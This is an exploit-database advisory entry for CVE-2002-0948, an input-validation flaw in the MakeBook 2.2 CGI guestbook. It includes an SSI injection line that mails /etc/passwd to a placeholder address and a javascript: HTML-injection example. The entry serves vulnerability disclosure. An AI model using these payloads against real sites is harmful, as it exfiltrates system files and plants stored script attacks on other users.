EXPLOITS

MakeBook 2.2 - Form Field Input Validation

Author: b0iler
type: webapps
platform: cgi
port: 
date_added: 2002-06-12  
date_updated: 2012-09-26  
verified: 1  
codes: CVE-2002-0948;OSVDB-14469  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21535.txt  

source: https://www.securityfocus.com/bid/4996/info

The MakeBook guestbook software does not sufficiently sanitize potentially dangerous characters from form field input. This may enable attackers to inject arbitrary HTML into form fields, which will be stored on guestbook pages. Additionally, it has been demonstrated that SSI (Server-Side Includes) may also be injected in this manner, and may be executed depending on the underlying environment.

Server-Side Include example:

Name: <!--#exec cmd="/bin/mail address@host < /etc/passwd"-->

HTML Injection example:

Name: <img src="javascript:alert('test');">